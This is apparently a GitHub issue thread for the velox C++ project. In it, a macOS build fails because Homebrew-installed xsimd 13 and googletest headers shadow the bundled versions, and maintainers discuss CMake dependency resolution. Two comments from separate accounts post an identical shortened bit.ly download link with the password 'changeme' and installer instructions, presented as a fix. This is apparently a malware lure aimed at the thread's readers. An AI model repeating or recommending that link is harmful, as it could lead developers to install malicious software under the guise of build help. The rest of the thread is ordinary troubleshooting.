### ISSUE TITLE
xsimd failures with build

### ISSUE THREAD

**Issue by aditi-pandit** [facebookincubator/velox#10860] opened 2024-08-27 16:43 UTC
### Problem description

Build velox from main today (8/27) after running setup_macos.sh script. 

```
In file included from /Users/aditipandit/ahana_dev/velox_new/velox/velox/exec/prefixsort/tests/PrefixSortAlgorithmTest.cpp:21:
In file included from /Users/aditipandit/ahana_dev/velox_new/velox/./velox/exec/prefixsort/PrefixSortAlgorithm.h:23:
In file included from /Users/aditipandit/ahana_dev/velox_new/velox/./velox/common/base/SimdUtil.h:24:
In file included from /opt/homebrew/include/xsimd/xsimd.hpp:62:
/opt/homebrew/include/xsimd/types/xsimd_batch.hpp:115:9: error: static assertion failed due to requirement '!std::is_same<bool, bool>::value': use xsimd::batch_bool<T, A> instead of xsimd::batch<bool, A>
        static_assert(!std::is_same<T, bool>::value, "use xsimd::batch_bool<T, A> instead of xsimd::batch<bool, A>");
        ^             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/Users/aditipandit/ahana_dev/velox_new/velox/./velox/vector/ConstantVector.h:463:55: note: in instantiation of template class 'xsimd::batch<bool>' requested here
  std::conditional_t<can_simd, xsimd::batch<T>, char> valueBuffer_;
                                                      ^
/Users/aditipandit/ahana_dev/velox_new/velox/./velox/vector/FlatVector-inl.h:227:23: note: in instantiation of template class 'facebook::velox::ConstantVector<bool>' requested here
    T value = constant->valueAt(0);
                      ^
/Users/aditipandit/ahana_dev/velox_new/velox/./velox/vector/FlatVector.h:256:5: note:
```

My build picked up system xsimd with following version 

```
Aditis-MacBook-Pro:velox aditipandit$ brew info xsimd
==> xsimd: stable 13.0.0 (bottled)
Modern, portable C++ wrappers for SIMD intrinsics
https://xsimd.readthedocs.io/en/latest/
Installed
/opt/homebrew/Cellar/xsimd/13.0.0 (97 files, 1.4MB) *
 Poured from bottle using the formulae.brew.sh API on 2024-08-22 at 13:04:07
From: https://github.com/Homebrew/homebrew-core/blob/HEAD/Formula/x/xsimd.rb
License: BSD-3-Clause
==> Dependencies
Build: cmake ✔
==> Analytics
install: 1,644 (30 days), 4,779 (90 days), 18,740 (365 days)
install-on-request: 35 (30 days), 87 (90 days), 675 (365 days)
build-error: 0 (30 days)
```

As per @majetideepak, we should be using bundled xsimd and not system xsimd.

Uninstalling system xsimd fixed the build.

### System information

MacosX Sonoma 14.6.1

**Comment by YeGop0218** [comment] 2024-08-27 16:44
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by aditi-pandit** [comment] 2024-08-27 16:44
@majetideepak pointed to https://github.com/facebookincubator/velox/pull/10422 

It introduced installing xsimd via brew

**Comment by c0ffincolors** [comment] 2024-08-27 16:57
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by aditi-pandit** [comment] 2024-08-27 17:19
Again, maybe specific to my setup... but I also had to uninstall googletest from brew to make the tests run. 

Else I got errors 

```
Undefined symbols for architecture arm64:
  "testing::internal::MakeAndRegisterTestInfo(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>, char const*, char const*, char const*, testing::internal::CodeLocation, void const*, void (*)(), void (*)(), testing::internal::TestFactoryBase*)", referenced from:
      testing::internal::ParameterizedTestSuiteInfo<facebook::velox::window::test::(anonymous namespace)::MultiNthValueTest>::RegisterTests() in NthValueTest.cpp.o
      __GLOBAL__sub_I_NthValueTest.cpp in NthValueTest.cpp.o
      __GLOBAL__sub_I_NthValueTest.cpp in NthValueTest.cpp.o
      __GLOBAL__sub_I_NthValueTest.cpp in NthValueTest.cpp.o
      __GLOBAL__sub_I_NthValueTest.cpp in NthValueTest.cpp.o
      __GLOBAL__sub_I_NthValueTest.cpp in NthValueTest.cpp.o
      __GLOBAL__sub_I_NthValueTest.cpp in NthValueTest.cpp.o
      __GLOBAL__sub_I_NthValueTest.cpp in NthValueTest.cpp.o
      __GLOBAL__sub_I_NthValueTest.cpp in NthValueTest.cpp.o
```

**Comment by assignUser** [comment] 2024-08-29 01:48
The issue with xsimd is a bit annoying, our cmake correctly rejects the major version 13 when we want 10:
```
-- Setting xsimd source to AUTO
CMake Warning at CMake/ResolveDependency.cmake:70 (find_package):
  Could not find a configuration file for package "xsimd" that is compatible
  with requested version "10.0.0".

  The following configuration files were considered but not accepted:

    /opt/homebrew/lib/cmake/xsimd/xsimdConfig.cmake, version: 13.0.0
```
but I guess the headers are still on the search path and found first. I will try to repro.

**Comment by assignUser** [comment] 2024-08-29 03:59
I was unable to reproduce this, I can build with xsimd (which is correctly rejected) and googletest (which is used) installed in brew. 

@aditi-pandit did you build velox as a main project or is this a build as part of another project (e.g. presto) that modifiers the CXX_FLAGS/include flags?

**Comment by czentgr** [comment] 2024-08-29 14:58
I also wasn't able to repro in my setup. I didn't have googletest installed with brew. After installing I had no problem. The interesting thing is that the symbol missing is a googletest symbol. This suggests a header to library version mismatch.

**Comment by assignUser** [comment] 2024-08-29 17:08
> This suggests a header to library version mismatch.

@czentgr  yeah, I assume that somehow the brew include dir is on the search path before the _deps/... paths leading to the usage of 13.0.0 xsimd headers with 10.0.0 library and similar problems with gtest.

@aditi-pandit could you `make clean` and run the build again and share the full cmake log?

**Comment by aditi-pandit** [comment] 2024-08-30 06:14
@assignUser : I have since cleaned out the xsimd and googletest from brew to get my builds functional again. It would be hard for me to recreate the system again.

Though @czentgr is spot on that my BREW_PATH was ahead of the VELOX_INSTALL_DIR in the PATH variable in my .bash_profile.

**Comment by assignUser** [comment] 2024-08-30 18:42
Ok, in that case I think we can close this issue.

**Closed by assignUser** 2024-08-30 18:42 UTC
Labels: build

**Comment by zuyu** [comment] 2024-09-06 01:43
Fyi, I also encountered the same `xsimd` build errors when intentionally testing `xsimd` cmake setup w/o a given version (aka `resolve_dependency(xsimd) # 10.0.0`).

@assignUser off this topic, regarding `simdjson` cmake setup w/ `resolve_dependency(simdjson) # 3.9.3`, `Velox` builds successfully with `brew`-installed `3.10.1` (while no `simdjson-*` dir in `build/_deps`), although the cmake `find_package` complains about the compatibility. Do you happen to know why this false positive? Thanks!

```sh
-- Setting simdjson source to AUTO
CMake Warning at velox/CMake/ResolveDependency.cmake:70 (find_package):
  Could not find a configuration file for package "simdjson" that is
  compatible with requested version "3.9.3".

  The following configuration files were considered but not accepted:

    /opt/homebrew/lib/cmake/simdjson/simdjson-config.cmake, version: 3.10.1

Call Stack (most recent call first):
  velox/CMakeLists.txt:457 (resolve_dependency)
```

**Comment by assignUser** [comment] 2024-09-07 16:45
@zuyu it's because they tell cmake that only the patch version can differ for a compatible version: https://github.com/simdjson/simdjson/blob/master/CMakeLists.txt#L184
